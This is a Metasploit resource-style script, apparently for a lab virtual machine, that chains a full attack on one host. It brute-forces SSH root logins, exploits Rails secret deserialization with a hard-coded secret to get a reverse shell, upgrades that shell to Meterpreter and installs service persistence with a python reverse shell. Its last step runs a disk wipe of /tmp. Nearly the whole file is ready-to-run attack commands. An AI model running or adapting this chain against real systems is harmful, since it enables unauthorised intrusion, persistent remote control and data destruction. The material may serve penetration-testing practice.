# ============================================================
# STEP 1 - SSH Brute Force
# ============================================================

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.181
set RPORT 22
set USERNAME root
set PASS_FILE/home/ahnafrr/Desktop/msf/unix_passwords_modified.txt
run

# ============================================================
# STEP 2 - Rails Secret Deserialization 
# ============================================================

use exploit/multi/http/rails_secret_deserialization
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.56.191
set LPORT 4444
set RHOSTS 192.168.56.181
set RPORT 8181
set TARGETURI /
set SECRET a7aebc287bba0ee4e64f947415a94e5f
exploit -j

# ============================================================
# STEP 3 - Upgrade Shell to Meterpreter
# ============================================================

use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# ============================================================
# STEP 4 - Service Persistence
# ============================================================

use exploit/linux/local/service_persistence
set PAYLOAD cmd/unix/reverse_python
set SESSION 1
set VERBOSE True
set LHOST 192.168.56.191
exploit -j

sessions -k 1,2,3

# ============================================================
# STEP 5 - Multi Handler    
# ============================================================

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_python
set SESSION 4
set VERBOSE True
set LHOST 192.168.56.191
exploit -j

# ============================================================
# STEP 6 - Disk Wipe
# ============================================================

sessions -i 4 
apt install wipe -y
sleep 15
wipe -rf /tmp
